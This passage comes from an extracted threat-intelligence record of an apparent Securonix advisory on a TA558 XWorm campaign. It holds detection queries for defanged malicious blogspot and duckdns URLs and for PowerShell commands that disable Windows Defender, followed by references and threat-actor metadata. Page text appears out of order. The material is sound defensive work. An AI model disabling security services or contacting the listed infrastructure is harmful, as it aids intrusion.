OR\r\nrequesturl CONTAINS “backuphotelall.blogspot[.]com” OR requesturl CONTAINS\r\n“3000allfitheyito.blogspot[.]com” OR requesturl CONTAINS “urlintimacygoombguch.blogspot[.]com” OR\r\nrequesturl CONTAINS “giv692dqvctosb3/50002023[.]txt” OR requesturl CONTAINS\r\n“port3000newspm.duckdns[.]org” OR requesturl CONTAINS “bakc5002.blogspot[.]com” OR requesturl\r\nCONTAINS “bakc5002.blogspot[.]com” OR requesturl CONTAINS “port5000duki.blogspot[.]com” OR requesturl\r\nCONTAINS “bakc5002.blogspot[.]com” OR requesturl CONTAINS “billielishhui.blogspot[.]com” OR requesturl\r\nCONTAINS “doccallingupdate.blogspot[.]com” OR requesturl CONTAINS\r\n“urlpropogationintimitacyi[.]blogspot.com”)\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS “WinDefend”\r\nAND message CONTAINS “Stop-Service” AND message CONTAINS ” -StartupType” AND message CONTAINS\r\n“Disabled”\r\nReferences:\r\n1. Elastic: Attack chain leads to XWORM and AGENTTESLA\r\nhttps://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla\r\n2. Securonix Threat Labs Initial Coverage Advisory: RCE 0-Day in MS Office (CVE-2022-30190)\r\nhttps://www.securonix.com/blog/rce-0-day-in-ms-office-using-ole-object-cve-2022-30190-analysis/\r\n3. ProofPoint: Reservations Requested: TA558 Targets Hospitality and Travel\r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\n4. BYPASSING AMSI VIA COM SERVER HIJACKING https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 16 of 17\n\n5. Reddit: XWorm v3.1 Cracked\r\nhttps://www.reddit.com/r/blackhatrussia/comments/11jqko9/xworm_v31_cracked/\r\nSource: https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 17 of 17\n\nbelow we see some request using one connection parameters of three user agents being defined. chosen at random: It establishes a connection to a remote HTTP server using a POST\n“Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0”\n Page 9 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/" ], "report_names": [ "securonix-threat-labs-security-meme4chan-advisory" ], "threat_actors": [ { "id": "316b23b5-e097-4dc6-8b1c-d096860c6c16", "created_at": "2022-10-25T16:07:24.290801Z", "updated_at": "2026-04-10T02:00:04.924688Z", "deleted_at": null, "main_name": "TA558", "aliases": [], "source_name": "ETDA:TA558", "tools": [ "AZORult", "AsyncRAT", "Bladabindi", "ExtRat", "Jorik", "Loda", "Loda RAT", "LodaRAT", "Nymeria", "PuffStealer", "Remcos", "RemcosRAT", "Remvio", "Revenge RAT", "RevengeRAT", "Revetrat", "Rultazo", "Socmer", "Vengeance Justice Worm", "Vjw0rm", "Xtreme RAT", "XtremeRAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "cf91b389-9602-45c0-8d6b-c61d14800f54", "created_at": "2023-01-06T13:46:39.448277Z", "updated_at": "2026-04-10T02:00:03.332604Z", "deleted_at": null, "main_name": "TA558", "aliases": [], "source_name": "MISPGALAXY:TA558", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434105, "ts_updated_at": 1775826763, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9da82963106b91cf0e93addc4504bf8bcd969f26.pdf", "text": "https://archive.orkl.eu/9da82963106b91cf0e93addc4504bf8bcd969f26.txt", "img": "https://archive.orkl.eu/9da82963106b91cf0e93addc4504bf8bcd969f26.jpg" } }